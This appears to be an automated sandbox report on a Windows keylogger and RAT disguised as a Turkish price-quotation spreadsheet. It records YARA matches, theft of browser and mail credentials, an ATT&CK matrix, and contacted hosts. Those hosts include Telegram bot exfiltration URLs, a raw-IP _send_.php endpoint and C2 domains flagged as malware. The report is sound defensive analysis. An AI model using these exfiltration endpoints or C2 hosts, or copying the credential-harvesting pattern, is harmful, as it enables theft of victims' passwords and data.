Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Queries volume information: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Queries volume information: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected MassLogger RAT

Source: Yara match

File source: 0000000E.00000002.4512207120.0000000000432000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Yara detected Snake Keylogger

Source: Yara match	File source: 00000009.00000002.4514569706.0000000003041000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.4515102020.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 9.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a9c618.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a595f8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a9c618.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a595f8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2092946249.00000000039C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe PID: 5664, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe PID: 7360, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: OnCgVRIhY.exe PID: 7732, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 9.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a9c618.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a595f8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a9c618.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a595f8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.4512203022.0000000000435000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.4512207120.0000000000434000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2092946249.00000000039C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe PID: 5664, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: OnCgVRIhY.exe PID: 7732, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Source: Yara match	File source: 9.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a9c618.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a595f8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a9c618.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a595f8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.4514569706.000000000314B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.4512203022.0000000000439000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.4515102020.000000000306E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2092946249.00000000039C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe PID: 5664, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe PID: 7360, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: OnCgVRIhY.exe PID: 7732, type: MEMORYSTR

Remote Access Functionality

Yara detected MassLogger RAT

Source: Yara match

File source: 0000000E.00000002.4512207120.0000000000432000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Yara detected Snake Keylogger

Source: Yara match	File source: 00000009.00000002.4514569706.0000000003041000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.4515102020.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 9.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a9c618.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a595f8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a9c618.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a595f8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2092946249.00000000039C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe PID: 5664, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe PID: 7360, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: OnCgVRIhY.exe PID: 7732, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 9.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a9c618.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a595f8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a9c618.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a595f8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.4512203022.0000000000435000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.4512207120.0000000000434000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2092946249.00000000039C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe PID: 5664, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: OnCgVRIhY.exe PID: 7732, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	1 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	11 Process Injection	1 Deobfuscate/Decode Files or Information	1 Input Capture	13 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Scheduled Task/Job	3 Obfuscated Files or Information	Security Account Manager	1 Query Registry	SMB/Windows Admin Shares	1 Screen Capture	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Software Packing	NTDS	11 Security Software Discovery	Distributed Component Object Model	1 Email Collection	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	1 Process Discovery	SSH	1 Input Capture	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	31 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Masquerading	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	31 Virtualization/Sandbox Evasion	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	11 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	32%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	32%	ReversingLabs	Win32.Trojan.Generic

Source	Detection	Scanner	Label
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
http://checkip.dyndns.org	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
http://varders.kozow.com:8081	0%	URL Reputation	safe
http://aborters.duckdns.org:8081	100%	URL Reputation	malware
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
http://checkip.dyndns.org/	0%	URL Reputation	safe
http://anotherarmy.dns.army:8081	100%	URL Reputation	malware
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
http://checkip.dyndns.org/q	0%	URL Reputation	safe
https://reallyfreegeoip.org	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/	0%	URL Reputation	safe
https://www.office.com/	0%	Avira URL Cloud	safe
https://chrome.google.com/webstore?hl=enlBcq	0%	Avira URL Cloud	safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Avira URL Cloud	safe
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:216865%0D%0ADate%20a	0%	Avira URL Cloud	safe
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:216865%0D%0ADate%20and%20Time:%2026/09/2024%20/%2022:26:13%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20216865%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	0%	Avira URL Cloud	safe
https://api.telegram.org/bot/sendMessage?chat_id=&text=	0%	Avira URL Cloud	safe
https://api.telegram.org	0%	Avira URL Cloud	safe
https://api.telegram.org/bot	0%	Avira URL Cloud	safe
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:216865%0D%0ADate%20and%20Time:%2027/09/2024%20/%2004:36:51%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20216865%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	0%	Avira URL Cloud	safe
https://reallyfreegeoip.org/xml/8.46.123.33	0%	Avira URL Cloud	safe
https://www.office.com/x	0%	Avira URL Cloud	safe
https://chrome.google.com/webstore?hl=enx	0%	Avira URL Cloud	safe
https://chrome.google.com/webstore?hl=en	0%	Avira URL Cloud	safe
https://www.office.com/lBcq	0%	Avira URL Cloud	safe
https://reallyfreegeoip.org/xml/8.46.123.33$	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
reallyfreegeoip.org	188.114.96.3	true	true	unknown
api.telegram.org	149.154.167.220	true	true	unknown
checkip.dyndns.com	132.226.8.169	true	false	unknown
checkip.dyndns.org	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:216865%0D%0ADate%20and%20Time:%2027/09/2024%20/%2004:36:51%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20216865%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:216865%0D%0ADate%20and%20Time:%2026/09/2024%20/%2022:26:13%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20216865%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false	Avira URL Cloud: safe	unknown
https://reallyfreegeoip.org/xml/8.46.123.33	false	Avira URL Cloud: safe	unknown
http://checkip.dyndns.org/	false	URL Reputation: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.office.com/	OnCgVRIhY.exe, 0000000E.00000002.4515102020.0000000003156000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/chrome_newtab	OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000003F81000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:216865%0D%0ADate%20a	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.4514569706.0000000003129000.00000004.00000800.00020000.00000000.sdmp, OnCgVRIhY.exe, 0000000E.00000002.4515102020.0000000003046000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000003F81000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.4514569706.0000000003129000.00000004.00000800.00020000.00000000.sdmp, OnCgVRIhY.exe, 0000000E.00000002.4515102020.0000000003046000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://chrome.google.com/webstore?hl=enlBcq	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.4514569706.00000000031B9000.00000004.00000800.00020000.00000000.sdmp, OnCgVRIhY.exe, 0000000E.00000002.4515102020.0000000003120000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000003F81000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2092946249.00000000039C9000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.4512203022.0000000000435000.00000040.00000400.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.4514569706.0000000003129000.00000004.00000800.00020000.00000000.sdmp, OnCgVRIhY.exe, 0000000E.00000002.4515102020.0000000003046000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000003F81000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.org	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.4514569706.0000000003041000.00000004.00000800.00020000.00000000.sdmp, OnCgVRIhY.exe, 0000000E.00000002.4515102020.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000003F81000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.4514569706.0000000003129000.00000004.00000800.00020000.00000000.sdmp, OnCgVRIhY.exe, 0000000E.00000002.4515102020.0000000003046000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://chrome.google.com/webstore?hl=en	OnCgVRIhY.exe, 0000000E.00000002.4515102020.0000000003125000.00000004.00000800.00020000.00000000.sdmp, OnCgVRIhY.exe, 0000000E.00000002.4515102020.0000000003156000.00000004.00000800.00020000.00000000.sdmp, OnCgVRIhY.exe, 0000000E.00000002.4515102020.0000000003116000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000003F81000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://chrome.google.com/webstore?hl=enx	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.4514569706.00000000031AF000.00000004.00000800.00020000.00000000.sdmp, OnCgVRIhY.exe, 0000000E.00000002.4515102020.0000000003116000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://varders.kozow.com:8081	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2092946249.00000000039C9000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.4512203022.0000000000433000.00000040.00000400.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.4514569706.0000000003041000.00000004.00000800.00020000.00000000.sdmp, OnCgVRIhY.exe, 0000000E.00000002.4515102020.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://aborters.duckdns.org:8081	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2092946249.00000000039C9000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.4512203022.0000000000433000.00000040.00000400.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.4514569706.0000000003041000.00000004.00000800.00020000.00000000.sdmp, OnCgVRIhY.exe, 0000000E.00000002.4515102020.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
https://ac.ecosia.org/autocomplete?q=	OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000003F81000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.office.com/x	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.4514569706.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, OnCgVRIhY.exe, 0000000E.00000002.4515102020.0000000003147000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
